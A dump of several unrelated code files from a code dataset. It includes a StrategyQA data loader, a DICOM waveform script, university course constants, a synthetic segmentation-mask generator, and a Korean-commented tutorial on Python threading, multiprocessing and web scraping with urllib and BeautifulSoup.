tf.cast(tf.convert_to_tensor(tok_str_[\"token_type_ids\"]),\n dtype=tf.dtypes.int32)\n\n idx_list_ = tf.convert_to_tensor(idx_list, dtype=tf.dtypes.string)\n idx_list = []\n\n if not self.is_test:\n labels_ = labels # store the values of the labels before resetting in the next line.\n labels = []\n labels_ = tf.cast(tf.convert_to_tensor(labels_), dtype=tf.dtypes.int8)\n\n if self.is_test:\n yield idx_list_, tok_str_\n else:\n yield idx_list_, tok_str_, labels_\n\n if self.is_test:\n yield None, None\n else:\n yield None, None, None\n\nif __name__ == \"__main__\":\n\n is_test = False\n tokenizer = BertTokenizer.from_pretrained(\"bert-base-cased\")\n dataLoader = StrategyQALoader(filepath=\"/large_data/StrategyQA/strategyqa/data/strategyqa/dev.json\",\n tokenizer=tokenizer,\n is_test=is_test)\n\n\n dataLoader.shuffle = False\n break_ = 100000000\n counter = 0\n if not is_test:\n for idx, example, label in dataLoader(batch_size=8):\n print(f\"idx: {idx}\\n\"\n f\"example: {example}\\n\"\n #f\"example-input_ids: {example['input_ids']}\\n\"\n f\"example: {tokenizer.batch_decode(example['input_ids'])}\\n\"\n f\"label: {label}\")\n if counter == break_: break\n counter += 1\n else:\n for idx, example in dataLoader(batch_size=8):\n print(f\"idx: {idx}\\n\"\n f\"example: {example}\\n\"\n f\"example: {tokenizer.batch_decode(example['input_ids'])}\\n\")\n if counter == break_: break\n counter += 1\n","repo_name":"KobeKnowles/Neuromodulation-Gated-Transformer","sub_path":"data_loaders/StrategyQA.py","file_name":"StrategyQA.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74749487204","text":"import numpy as np\n\n\ndef wave_analysis(dicom_data):\n wave = dicom_data[0x5400, 0x0100][0][0x5400, 0x1010].value\n wave = [wave[i] for i in range(len(wave))]\n wave = np.array(wave[::2] - np.min(wave[::2]))\\\n / np.max(wave[::2] - np.min(wave[::2])) * 100\n freq = dicom_data[0x5400, 0x0100][0][0x003a, 0x001a].value\n wave_samples = dicom_data[0x5400, 0x0100][0][0x003a, 0x0010].value\n wave_time = [i / freq for i in range(wave_samples)]\n wave = np.delete(wave, len(wave)-1)\n wave_time = np.delete(wave_time, 0)\n return wave, wave_time\n # return wave, wave_time, wave_raw, wave_time_raw\n\n\nif __name__ == \"__main__\":\n import pydicom\n import matplotlib.pyplot as plt\n\n dicom_file = \"../710509.dcm\"\n dicom = pydicom.dcmread(dicom_file)\n wave, wave_time = wave_analysis(dicom)\n print(wave)\n print(wave_time)\n plt.plot(wave_time, wave, \"o\")\n plt.show()\n","repo_name":"kfuka/RemoaQt","sub_path":"wave_analysis.py","file_name":"wave_analysis.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33526894385","text":"# © 2023 App Development Club @ Oregon State Unviersity\n# All Rights Reserved\n\n# Miscellaneous constants used throughout the project\n# - course_map used to map the course number to the course name\n# - data_map used to map the data to the course number\n\ncourse_map = {\n \"101\": \"Computers: Apps & Implications\",\n \"161\": \"Introduction to Computer Science I\",\n \"162\": \"Introduction to Computer Science II\",\n \"225\": \"Discrete Structures in CS\",\n \"261\": \"Data Structures\",\n \"271\": \"Computer Architecture & Assembly Langugage\",\n \"290\": \"Web Development\",\n \"321\": \"Intro to Theory of Computation\",\n \"325\": \"Analysis of Algorithms\",\n \"331\": \"Intro Artificial Intelligence\",\n \"340\": \"Introduction to Databases\",\n \"352\": \"Intro to Usability Engineering\",\n \"361\": \"Software Engineering I\",\n \"362\": \"Software Engineering II\",\n \"370\": \"Introduction to Security\",\n \"373\": \"Defense Against the Dark Arts\",\n \"374\": \"Operating Systems I\",\n \"381\": \"Programming Language Fundamentals\",\n \"391\": \"Social & Ethical Issues in Computer Science\",\n \"399\": \"ST/Pathways to EECS\",\n \"406\": \"Projects\",\n \"434\": \"Machine Learning & Data Mining\",\n \"444\": \"Operating Systems II\",\n \"450\": \"Intro to Computer Graphics\",\n \"453\": \"Scientific Visualization\",\n \"461\": \"Senior Software Engineering Project\",\n \"464\": \"Open Source Software\",\n \"467\": \"Online Capstone Project\",\n \"468\": \"Inclusive Design (HCI)\",\n \"469\": \"Real-World Project Mgmt in CS\",\n \"472\": \"Computer Architecture\",\n \"493\": \"Cloud Application Development\",\n \"499\": \"ST/Empirical Computer Security\",\n \"501\": \"Research\",\n \"510\": \"Occupational Internship\",\n \"511\": \"Programming & Data Structures\",\n \"514\": \"Algorithms\",\n \"515\": \"Algorithms & Data Structures\",\n \"544\": \"Operating Systems II\",\n \"550\": \"Intro to Computer Graphics\",\n \"552\": \"Computer Animation\",\n \"553\": \"Scientific Visualization\",\n \"559\": \"ST/Digital Image Processing\",\n \"568\": \"Inclusive Design (HCI)\",\n \"572\": \"Computer Architecture\",\n \"579\": \"ST/Empirical Computer Security\",\n \"ECE271\": \"Digital Logic Design\",\n \"ECE322\": \"Electronics I\",\n \"ECE341\": \"Junior Design I\",\n \"ECE351\": \"Signals and Systems I\",\n \"ECE372\": \"Intro to Computer Networks\",\n \"ECE375\": \"Computer Org & Assembly Lang\",\n \"ECE390\": \"Electric and Magnetic Fields\",\n \"ECE399\": \"ST/Pathways to EECS\",\n \"ECE416\": \"Electronic Materials & Devices\",\n \"ECE422\": \"CMOS Integrated Circuits I\",\n \"ECE431\": \"Power Electronics\",\n \"ECE433\": \"Power System Analysis\",\n \"ECE451\": \"Systems Dynamics and Control\",\n \"ECE461\": \"Analog & Digital Communication\",\n \"ECE464\": \"Digital Signal Processing\",\n \"ECE468\": \"Digital Image Processing\",\n \"ECE472\": \"Computer Architecture\",\n \"ECE473\": \"Microcontroller System Design\",\n \"ECE499\": \"ST/Printed & Flexible Electron\",\n \"ECE516\": \"Electronic Materials & Devices\",\n \"ECE522\": \"CMOS Integrated Circuits I\",\n \"ECE530\": \"Contemp Energy Applications\",\n \"ECE531\": \"Power Electronics\",\n \"ECE533\": \"Power System Analysis\",\n \"ECE560\": \"Stochastic Signals & Systems\",\n \"ECE561\": \"Analog & Digital Communication\",\n \"ECE564\": \"Digital Signal Processing\",\n \"ECE565\": \"Estimation, Filtering, Detect\",\n \"ECE569\": \"Convex Optimization\",\n \"ECE572\": \"Computer Architecture\",\n \"ECE573\": \"Microcontroller System Design\",\n \"ECE580\": \"Network Theory\",\n \"ECE590\": \"Analytical Techqs in Electroma\",\n \"ECE599\": \"ST/Printed & Flexible Electron\",\n \"ECE614\": \"Semiconductors\",\n \"ECE621\": \"Radio Frequency IC Design\",\n}\n\ndata_map = [\n {\n \"index\": \"cs325-index\",\n \"filename\": \"CS325_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"325\",\n \"course_name\": \"Analysis of Algorithms\",\n },\n {\n \"index\": \"cs321-index\",\n \"filename\": \"CS321_UN.pdf\",\n \"term\": \"unknown\",\n \"crn\": \"321\",\n \"course_name\": \"Intro to Theory of Computation\",\n },\n {\n \"index\": \"cs370-index\",\n \"filename\": \"CS370_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"370\",\n \"course_name\": \"Introduction to Security\",\n },\n {\n \"index\": \"cs271-index\",\n \"filename\": \"CS271_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"271\",\n \"course_name\": \"Computer Architecture & Assembly Langugage\",\n },\n {\n \"index\": \"cs261-index\",\n \"filename\": \"CS261_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"261\",\n \"course_name\": \"Data Structures\",\n },\n {\n \"index\": \"cs290-index\",\n \"filename\": \"CS290_S22.pdf\",\n \"term\": \"S22\",\n \"crn\": \"290\",\n \"course_name\": \"Web Development\",\n },\n {\n \"index\": \"cs225-index\",\n \"filename\": \"CS225_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"225\",\n \"course_name\": \"Discrete Structures in CS\",\n },\n {\n \"index\": \"cs372-index\",\n \"filename\": \"CS372_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"372\",\n \"course_name\": \"Intro to Computer Networks\",\n },\n {\n \"index\": \"cs362-index\",\n \"filename\": \"CS362_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"362\",\n \"course_name\": \"Software Engineering II\",\n },\n {\n \"index\": \"cs461-index\",\n \"filename\": \"CS461_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"461\",\n \"course_name\": \"Senior Software Engineering Project\",\n },\n {\n \"index\": \"cs361-index\",\n \"filename\": \"CS361_F23.docx\",\n \"term\": \"unknown\",\n \"crn\": \"361\",\n \"course_name\": \"Software Engineering I\",\n },\n {\n \"index\": \"cs373-index\",\n \"filename\": \"CS373_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"373\",\n \"course_name\": \"Defense Against the Dark Arts\",\n },\n {\n \"index\": \"cs161-index\",\n \"filename\": \"CS161_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"161\",\n \"course_name\": \"Introduction to Computer Science I\",\n },\n {\n \"index\": \"cs340-index\",\n \"filename\": \"CS340_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"340\",\n \"course_name\": \"Introduction to Databases\",\n },\n {\n \"index\": \"cs464-index\",\n \"filename\": \"CS464_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"464\",\n \"course_name\": \"Open Source Software\",\n },\n {\n \"index\": \"cs444-index\",\n \"filename\": \"CS444_S22.pdf\",\n \"term\": \"S22\",\n \"crn\": \"444\",\n \"course_name\": \"Operating Systems II\",\n },\n {\n \"index\": \"cs493-index\",\n \"filename\": \"CS493_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"493\",\n \"course_name\": \"Cloud Application Development\",\n },\n {\n \"index\": \"cs467-index\",\n \"filename\": \"CS467_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"467\",\n \"course_name\": \"Online Capstone Project\",\n },\n {\n \"index\": \"cs391-index\",\n \"filename\": \"CS391_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"391\",\n \"course_name\": \"Social & Ethical Issues in Computer Science\",\n },\n {\n \"index\": \"cs381-index\",\n \"filename\": \"CS381_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"381\",\n \"course_name\": \"Programming Language Fundamentals\",\n },\n {\n \"index\": \"cs162-index\",\n \"filename\": \"CS162_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"162\",\n \"course_name\": \"Introduction to Computer Science II\",\n },\n {\n \"index\": \"cs450-index\",\n \"filename\": \"CS450_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"450\",\n \"course_name\": \"Intro to Computer Graphics\",\n },\n {\n \"index\": \"cs352-index\",\n \"filename\": \"CS352_F23.pdf\",\n \"term\": \"F23\",\n \"crn\": \"352\",\n \"course_name\": \"Intro to Usability Engineering\",\n },\n]\n","repo_name":"OSU-App-Club/beavsAI-AI","sub_path":"server/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":7816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2169927360","text":"import os\nfrom PIL import Image\nimport numpy as np\nimport scipy\nimport scipy.stats\nimport random\nimport ipdb\n\nobj_dir = '/home/zeng/data/datasets/obj_mr_msk_crf'\nbg_dir = '/home/zeng/data/datasets/bg'\noutput_dir_img = '/home/zeng/data/datasets/syn_seg_mr/images'\noutput_dir_msk = '/home/zeng/data/datasets/syn_seg_mr/masks'\n\n\nif not os.path.exists(output_dir_img):\n os.mkdir(output_dir_img)\nif not os.path.exists(output_dir_msk):\n os.mkdir(output_dir_msk)\n\nobj_names = os.listdir(obj_dir)\nbg_names = os.listdir(bg_dir)\n\npalette = [0, 0, 0, 128, 0, 0, 0, 128, 0, 128, 128, 0, 0, 0, 128, 128, 0, 128, 0, 128, 128,\n 128, 128, 128, 64, 0, 0, 192, 0, 0, 64, 128, 0, 192, 128, 0, 64, 0, 128, 192, 0, 128,\n 64, 128, 128, 192, 128, 128, 0, 64, 0, 128, 64, 0, 0, 192, 0, 128, 192, 0, 0, 64, 128]\nzero_pad = 256 * 3 - len(palette)\nfor i in range(zero_pad):\n palette.append(0)\n\n\n# for obj_name, bg_name in zip(obj_names, bg_names):\ndef proc_one(bg_name, num):\n #ii = np.random.normal(loc=2, scale=1)\n ii = 1\n ii = 1 if ii <=0 else ii\n bg = Image.open(os.path.join(bg_dir, bg_name))\n sbc, sbr = bg.size\n ratio = 400.0 / max(sbr, sbc)\n bg = bg.resize((int(sbc * ratio), int(sbr * ratio)))\n bg = np.array(bg, dtype=np.uint8)\n r, c, _ = bg.shape\n mask = np.zeros((bg.shape[0], bg.shape[1], 1), dtype=np.uint8)\n locs = np.linspace(0, 1, ii+2)[1:-1]\n for i in range(ii):\n obj_name = random.choice(obj_names)\n obj = Image.open(os.path.join(obj_dir, obj_name))\n r_location = scipy.stats.norm.rvs(locs[i]-0.25, 0.2, size=1)[0] * r\n r_location = int(r_location)\n r_location = max(0, r_location)\n r_location = min(r_location, r - 1)\n\n c_location = scipy.stats.norm.rvs(locs[i]-0.25, 0.2, size=1)[0] * c\n c_location = int(c_location)\n c_location = max(0, c_location)\n c_location = min(c_location, c - 1)\n length = scipy.stats.norm.rvs(0.5, 0.07, size=1)[0] * max(r, c)\n length = max(length, 10)\n\n sbc, sbr = obj.size\n ratio = length / max(sbr, sbc)\n obj = obj.resize((int(sbc * ratio), int(sbr * ratio)))\n sbc, sbr = obj.size\n\n r_location_end = min(r_location + sbr, r)\n c_location_end = min(c_location + sbc, c)\n\n obj_r_end = min(r_location_end - r_location, sbr)\n obj_c_end = min(c_location_end - c_location, sbc)\n\n obj = np.array(obj, dtype=np.uint8)\n m_obj = obj[:, :, 3]\n m_obj[m_obj != 0] = 1\n m_obj = np.expand_dims(m_obj, 2)\n obj = obj[:, :, :3]\n\n bg[r_location:r_location_end, c_location:c_location_end] = \\\n bg[r_location:r_location_end, c_location:c_location_end] * (1 - m_obj[:obj_r_end, :obj_c_end]) \\\n + obj[:obj_r_end, :obj_c_end] * m_obj[:obj_r_end, :obj_c_end]\n mask[r_location:r_location_end, c_location:c_location_end] = \\\n mask[r_location:r_location_end, c_location:c_location_end] * (1-m_obj[:obj_r_end, :obj_c_end]) \\\n + (i+1)*m_obj[:obj_r_end, :obj_c_end]\n bg = Image.fromarray(bg)\n bg.save(os.path.join(output_dir_img, '{}_{}.jpg'.format( bg_name[:-4], num)))\n mask = mask[:, :, 0]\n mask = Image.fromarray(mask)\n mask = mask.convert('P')\n mask.putpalette(palette)\n mask.save(os.path.join(output_dir_msk, '{}_{}.png'.format( bg_name[:-4], num)))\n\n\nif __name__ == \"__main__\":\n for i in range(3000):\n bg_name = random.choice(bg_names)\n proc_one(bg_name, i)\n","repo_name":"ZHongshuang/mws","sub_path":"syn_msk.py","file_name":"syn_msk.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11448520155","text":"# crawling.py\r\n\r\n# 스레드 Thread\r\n# 스레드를 쓰지 않은경우\r\n# import time\r\n# def doing() :\r\n# time.sleep(1) # 1초 마다 멈춰라\r\n# print(\"실행중\")\r\n#\r\n# start = time.time()\r\n# for i in range(10) : # 10번반복\r\n# doing()\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start)) # 반복이 끝난후 시간 표시\r\n\r\n# 스레드를 사용하여 처리한 경우\r\nimport time\r\nimport threading\r\n# def doing() :\r\n# time.sleep(1)\r\n# print(\"쓰레드 실행중\")\r\n# # 메인도 쓰레드 이기에 메인도 만들어주어야함\r\n# if __name__ == \"__main__\" :\r\n# start = time.time() # 실행전 저장\r\n# # 조인이라는 메소드를 실행 해 주어야함\r\n# # 반복문으로 돌림, 쓰레드를 리스트로 담음\r\n# threads = []\r\n# for i in range(10) :\r\n# t = threading.Thread(target=doing) # run이라는 메소드가 있지만 파이썬은 아무거나 정해주면됨\r\n# t.start() # 실행 대기 상태\r\n# threads.append(t)\r\n# for thread in threads :\r\n# thread.join()\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n \r\n#-------------------------------------------------------------------------\r\n\r\n# 조인을 안부를 수 있게하는 방법이 있음\r\n# 동시\r\n# concurrent\r\nfrom concurrent import futures # start() join을 자동으로 처리\r\n# def doing() :\r\n# time.sleep(1)\r\n# return \"스레드 실행중\" # 리턴 시켜줌\r\n# if __name__ == \"__main__\" :\r\n# start = time.time()\r\n# results = []\r\n# with futures.ThreadPoolExecutor() as excutor :\r\n# for i in range(10) :\r\n# result = excutor.submit(doing)\r\n# results.append(result)\r\n# for f in futures.as_completed(results) :\r\n# print(f.result())\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n \r\n#---------------------------------------------------------------------------\r\n\r\n# 쓰레드를 사용하지않음\r\n# 연산\r\n# 멀티프로세스\r\n# def calc_sum(list) :\r\n# sum = 0\r\n# for i in range(list[0], list[1]+1) :\r\n# # 넘어온 값만큼 sum을 계산\r\n# sum += i\r\n# return sum\r\n# if __name__ == \"__main__\" :\r\n# start = time.perf_counter() # time.time() 써도 상관 없음, 기능은 똑같음\r\n# result = calc_sum([1, 100000000]) # 실행시간이 길라면 숫자를 크게 주면됨\r\n# print(result)\r\n# end = time.perf_counter()\r\n# print(\"실행시간 :\",(end-start))\r\n\r\n#---------------------------------------------------------------------------\r\n\r\n# 쓰레드로 처리\r\n# def calc_sum(list):\r\n# sum = 0\r\n# for i in range(list[0], list[1]+1) :\r\n# sum += i\r\n# return sum\r\n# if __name__ == \"__main__\" :\r\n# # start(), join() 뺄거임\r\n# start = time.time()\r\n# with futures.ThreadPoolExecutor() as excutor :\r\n# # 2차원 배열로 만들것임\r\n# sub = [ [1, 100000000//2], [100000000//2 + 1, 100000000] ] # 리스트로 던지는것이 시작위치와 끝 위치, index로 주기에 정수가나와야함 // 두개 써줘야함\r\n# results = excutor.map(calc_sum, sub) # 알아서 처리함\r\n# print(sum(results))\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n\r\n#------------------------------------------------------------------------\r\n\r\n# 멀티프로세스\r\nfrom multiprocessing import Pool\r\n# def calc_sum(list):\r\n# sum = 0\r\n# for i in range(list[0], list[1]+1) :\r\n# sum += i\r\n# print(sum)\r\n# if __name__ == \"__main__\" :\r\n# start = time.time()\r\n# sub = [ [1, 100000000//2], [100000000//2 + 1, 100000000] ]\r\n# pool = Pool(processes=2) # 프로세스를 몇개를 쓸것인지 정해줌\r\n# pool.map(calc_sum, sub)\r\n# pool.close() # 썻기에 닫아주어야함\r\n# pool.join()\r\n# end = time.time()\r\n# print(\"실행시간 :\",(end-start))\r\n\r\n#------------------------------------------------------------------------\r\n\r\n# 쓰레드 동기화\r\n# 두개를 동시에 처리하면서 공유하는 변수가 있어야함\r\n# 전역변수로 변수 생성\r\n\r\n# number = 0\r\n# def thread1(num):\r\n# global number\r\n# for i in range(num+1) :\r\n# number += 1\r\n#\r\n# def thread2(num):\r\n# global number\r\n# for i in range(num+1) :\r\n# number += 1\r\n#\r\n# # 쓰레드 처리\r\n# if __name__ == \"__main__\" :\r\n# threads = [] # 쓰레드 들을 담을 리스트\r\n# start = time.time()\r\n# t1 = threading.Thread(target=thread1, args=(50000000,))\r\n# t1.start()\r\n# threads.append(t1)\r\n# t2 = threading.Thread(target=thread2, args=(50000000,))\r\n# t2.start()\r\n# threads.append(t2)\r\n# for thread in threads :\r\n# thread.join()\r\n# print(number)\r\n# end = time.time()\r\n# print(\"실행시간 :\", (end-start))\r\n \r\n#------------------------------------------------------------------------\r\n\r\n# 쓰레드의 충돌 방지\r\n# 쓰레드 동기화\r\n# number = 0\r\n# lock = threading.Lock()\r\n# def thread1(num):\r\n# global number\r\n# lock.acquire() # 다른 스레드의 접근을 금지하도록 락을 걸어줌\r\n# for i in range(num) :\r\n# number += 1\r\n# lock.release() # 작업이 끝났기 때문에 락을 풀어줌\r\n# def thread2(num):\r\n# global number\r\n# lock.acquire() # 다른 스레드의 접근을 금지하도록 락을 걸어줌\r\n# for i in range(num) :\r\n# number += 1\r\n# lock.release() # 작업이 끝났기 때문에 락을 풀어줌\r\n# # 쓰레드 처리\r\n# if __name__ == \"__main__\" :\r\n# threads = [] # 쓰레드 들을 담을 리스트\r\n# start = time.time()\r\n# t1 = threading.Thread(target=thread1, args=(50000000,))\r\n# t1.start()\r\n# threads.append(t1)\r\n# t2 = threading.Thread(target=thread2, args=(50000000,))\r\n# t2.start()\r\n# threads.append(t2)\r\n# for thread in threads :\r\n# thread.join()\r\n# print(number)\r\n# end = time.time()\r\n# print(\"실행시간 :\", (end-start))\r\n\r\n#------------------------------------------------------------------------\r\n\r\n# 멀티프로세스 동기화\r\n# 공유하는 변수가 있을경우 멀티 프로세스도 동기화를 해주어야함\r\n# from multiprocessing import shared_memory, Semaphore, Process\r\n# import numpy as np\r\n# def calc_sum(id, number, shm, arr, sem): # 매개변수를 여러개 받아줌, 쓰레드의 이름이 넘어옴\r\n# # id 스레드 번호\r\n# # number 최대값\r\n# # shm 공유메모리(셰어드메모리)\r\n# # arr numpy.array배열\r\n# # sem 세마포어\r\n# sum = 0\r\n# for i in range(number) :\r\n# sum += 1\r\n# sem.acquire() # 세마포어 획득, 임계영역에 들어감, 임계영역은 무조건 (쓰레드)1개밖에 못들어감, 하지만 세마포어는 여러개가 가능함\r\n# # 세마포어는 자리하나를 차지했다는 개념이라, 충돌안나게 처리해줌\r\n# new_shm = shared_memory.SharedMemory(name=shm) # 공유매모리를 사용할 수 있게 가져옴\r\n# tmp_arr = np.ndarray(arr.shape, dtype=arr.dtype, buffer=new_shm.buf) # 넘겨받은 갯수만큼 받아라, 넘겨받은 array의 dtype, 임시기억장소\r\n# tmp_arr[0] += sum # 쓰레드 들이 계산한 값을 누적해야함\r\n# sem.release() # 세마포어 해제\r\n# if __name__ == \"__main__\" :\r\n# start = time.time()\r\n# arr = np.array([0]) # 0을 넣어놓는 하나짜리 방 생성\r\n# # 공유 메모리이기에 메인에서 만들어서 보냄\r\n# shm = shared_memory.SharedMemory(create=True, size=arr.nbytes)\r\n# np_shm = np.ndarray(arr.shape, dtype=arr.dtype, buffer=shm.buf)\r\n# sem = Semaphore()\r\n# p1 = Process(target=calc_sum, args=(1, 50000000, shm.name, np_shm, sem)) # 다 넘어가야함\r\n# p2 = Process(target=calc_sum, args=(2, 50000000, shm.name, np_shm, sem))\r\n# p1.start()\r\n# p2.start()\r\n# p1.join()\r\n# p2.join()\r\n# end = time.time()\r\n# print(np_shm[0]) # 합계는 이곳에 들어있음\r\n# print(\"실행시간 :\", (end-start))\r\n# shm.close() # 닫다\r\n# shm.unlink() # 끊다\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n# 네트워크\r\nimport urllib.request as req\r\nfrom urllib.error import URLError\r\n# f = req.urlopen(\"http://www.daum.net\") # 먼저 열어주어야함, 링크를 주면됨\r\n# print(f.read( 100 ).decode(\"utf-8\")) # 몇 바이트 읽어올지, 디코딩 해주어야함\r\n# html 소스를 가져옴\r\n\r\n# re = req.Request(\"http://www.daum.net\")\r\n# try :\r\n# req.urlopen(re) # 오픈시 예외처리\r\n# except URLError as e :\r\n# print(e.reason)\r\n\r\n# response = req.urlopen(\"http://www.daum.net\")\r\n# print(response) # 객체가 넘어옴, 하나씩 꺼내써야함, 메소드를 통해 꺼내면됨\r\n# print(\"url :\",response.geturl())\r\n# headers = response.info() # 헤더 정보들이 넘어옴\r\n# print(\"date :\", headers[\"date\"]) # 딕셔너리\r\n# print(headers) # 많은 정보가 있음\r\n# data = response.read() # 모든 데이터를 가져옴\r\n# print(len(data)) # 데이터의 길이\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n\r\n# # 크롤링\r\n# import urllib.request\r\n# url = \"https://cdn.topstarnews.net/news/photo/202205/14689700_790468_3839.jpg\"\r\n# savename = \"ricegood.jpg\"\r\n# urllib.request.urlretrieve(url, savename)\r\n# print(\"저장했습니다\")\r\n#\r\n# # 파일저장\r\n# url = \"http://www.google.com/robots.txt\"\r\n# txt = urllib.request.urlopen(url)\r\n# data = txt.read().decode(\"utf-8\")\r\n# # print(data) # 콘솔창 표시\r\n# with open(\"robots.txt\", \"w\", encoding=\"utf-8\") as f:\r\n# f.write(data)\r\n# print(\"저장했습니다.\")\r\n\r\n#-------------------------------------------------------------------------------------------------\r\n\r\n# 스크랩핑\r\n# RSS -> 스크랩핑을 해라 라고 재공해주는 것, 기본은 XML, 제공해 주는것이 많지는 않음, 기상청같은경우 RSS를 이용해 크롤링 해야함\r\nimport urllib.request as req\r\nimport urllib.parse as pa # 나중에 주소와 아이디를 합치기 위함\r\n# url = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=109\"\r\nurl = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp\" # ?stnId=109 이부분은 나중에 따로 사용할 예정\r\nvalues = { # 딕셔너리로 만듬\r\n \"stnId\" : 109\r\n }\r\nparams = pa.urlencode(values)\r\nurl = url + \"?\" + params # 주소를 합침\r\n# print(url)\r\n\r\ndata = req.urlopen(url).read().decode(\"utf-8\") # 주소를 읽어들임\r\n# print(data)\r\n\r\n#------------------------------------------------------------------------------------------------------\r\n# BeauticulSoup\r\nfrom bs4 import BeautifulSoup as bs\r\nhtml = \"\"\"\r\n <html>\r\n <head>\r\n <meta charset=\"utf-8\">\r\n <title>HTML Test \r\n \r\n \r\n

HTML 연습

\r\n

짜장면

\r\n

짱뽕

\r\n

탕수육

\r\n

울면

\r\n \r\n \r\n\"\"\"\r\n\r\nsoup = bs(html, \"html.parser\") # html을 자르는것\r\nprint(\"<<\" +soup.find(\"h2\").string+ \">>\") # 글자를 꺼내라\r\nprint(\"<<\" +soup.html.body.h2.string+ \">>\")\r\n\r\nh2 = soup.find(\"h2\")\r\nbody = h2.parent # body만 출력\r\n# print(body)\r\nhtml = body.parent # html 전부 출력\r\n# print(html)\r\np1 = h2.next_sibling.next_sibling\r\nprint(p1.string)\r\nnodes = body.children\r\n# for node in nodes :\r\n# print(node) # 자식 노드들이 나옴\r\n# print(node.string) # 문자열만 나옴\r\n\r\nps = soup.find_all(\"p\") # p테그 찾기\r\nfor p in ps :\r\n print(p.string)\r\n \r\np = body.findChild()\r\nprint(h2.string)\r\nprint()\r\n\r\np1 = soup.find(id=\"first\") # id가 first인것\r\nprint(p1.string)\r\n\r\np4 = soup.find(id=\"second\") # id가 second인것\r\nprint(p4.string)\r\n\r\npp = soup.find_all(class_=\"strong\") # class는 예약어 이기에 _를 포함함\r\nfor p in pp :\r\n print(p.string)\r\n \r\n \r\n# select()\r\n# select_one()\r\n# 테그 밑에 테그가 또있어야하���것이 필요\r\nhtml = \"\"\"\r\n \r\n \r\n \r\n HTML 연습 \r\n \r\n \r\n

웹 스크랩핑

\r\n

HTML

\r\n

XML

\r\n

JSON

\r\n CDATA \r\n \r\n \r\n\"\"\"\r\nsoup = bs(html, \"html.parser\")\r\nh2 = soup.select_one(\"body h2\")\r\nprint(\"<<\" + h2.string + \">>\")\r\n\r\nps = soup.select( \".subject\" )\r\nfor p in ps :\r\n print( p.string )\r\n\r\npp = soup.select( \"body p\" )\r\nfor p in pp :\r\n print( p.string )\r\n \r\npp = soup.select( \"p a\" ) # 자손 선택자\r\nfor p in pp :\r\n print( p.string )\r\n\r\npp = soup.select( \"p > a\" ) # 자식 선택자\r\nfor p in pp :\r\n print( p.string )\r\n \r\np = soup.select_one(\"p#name\")\r\nprint(p.string)\r\n\r\np = soup.select_one(\"p.subject\")\r\nprint(p.string)\r\n#------------------------------------------------------------------------------------------------------\r\n\r\n# RSS -> 스크랩핑을 해라 라고 재공해주는 것, 기본은 XML, 제공해 주는것이 많지는 않음, 기상청같은경우 RSS를 이용해 크롤링 해야함\r\nimport urllib.request as req\r\nimport urllib.parse as pa # 나중에 주소와 아이디를 합치기 위함\r\n# url = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp?stnId=109\"\r\nurl = \"http://www.kma.go.kr/weather/forecast/mid-term-rss3.jsp\" # ?stnId=109 이부분은 나중에 따로 사용할 예정\r\nvalues = { # 딕셔너리로 만듬\r\n \"stnId\" : 109\r\n }\r\nparams = pa.urlencode(values)\r\nurl = url + \"?\" + params # 주소를 합침\r\n# print(url)\r\n\r\ndata = req.urlopen(url).read().decode(\"utf-8\") # 주소를 읽어들임\r\n# print(data) # 데이터 양이 많음\r\n\r\nwith open(\"whether.txt\", \"w\", encoding=\"utf-8\") as f : # 파일을 저장\r\n f.write(data) # 저장할 필요는 없음, 데이터 확인용\r\n\r\nsoup = bs(data , \"html.parser\") # 데이터를 자름\r\n\r\ntitle = soup.find(\"title\")\r\nprint(\"<<\" + title.string + \">>\")\r\n\r\ncities = soup.find_all(\"city\") # city를 다 뽑음\r\n# for city in cities : # 반복문으로 돌려 city 만뽑음\r\n# print(city.string)\r\n \r\ndatas = soup.find_all(\"data\") # data를 다 뽑음\r\nfor data in datas : # 반복문을 새로 돌림\r\n print(data.parent.city.string, end=\"\\t\") # city 와 data가 동일선상에 놓여있음, 출력하고 탭을함\r\n print(data.tmef.string, \"\\t\", data.wf.string, # 시간을 뽑음, 그후 탭을 한후 날씨를 뽑음\r\n \"\\t\", data.tmn.string, \"\\t\", data.tmx.string) # 최저기온과 최고기온을 뽑음\r\nprint()\r\n#------------------------------------------------------------------------------------------------------","repo_name":"2Hyeok/Django","sub_path":"network/crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":14898,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17661190912","text":"# -*- coding: utf-8 